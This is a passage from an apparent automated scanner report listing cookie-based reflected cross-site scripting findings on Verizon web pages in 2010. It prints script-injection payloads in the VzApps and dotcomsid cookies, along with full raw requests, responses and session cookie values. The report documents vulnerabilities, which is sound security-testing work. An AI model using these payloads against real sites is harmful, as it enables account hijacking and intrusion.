Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=c6862"-alert(1)-"9695dc43a78; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76442
Expires: Sat, 20 Nov 2010 02:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "c6862"-alert(1)-"9695dc43a78"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.190. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0dac'><script>alert(1)</script>82a3c612b6a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd0dac'><script>alert(1)</script>82a3c612b6a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TXd0dac'><script>alert(1)</script>82a3c612b6a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD0DAC'><SCRIPT>ALERT(1)</SCRIPT>82A3C612B6A ' />
...[SNIP]...

1.191. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 3db93<script>alert(1)</script>e45ae62280 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX3db93<script>alert(1)</script>e45ae62280; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78161
Expires: Sat, 20 Nov 2010 02:53:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX3db93<script>alert(1)</script>e45ae62280; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3DB93<SCRIPT>ALERT(1)</SCRIPT>E45AE62280 </DIV>
...[SNIP]...

1.192. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"037c2ee7a79 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=1f41c"-alert(1)-"037c2ee7a79; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83946
Expires: Sat, 20 Nov 2010 02:53:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "1f41c"-alert(1)-"037c2ee7a79"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.193. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90afa'><script>alert(1)</script>32063bb4fe6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
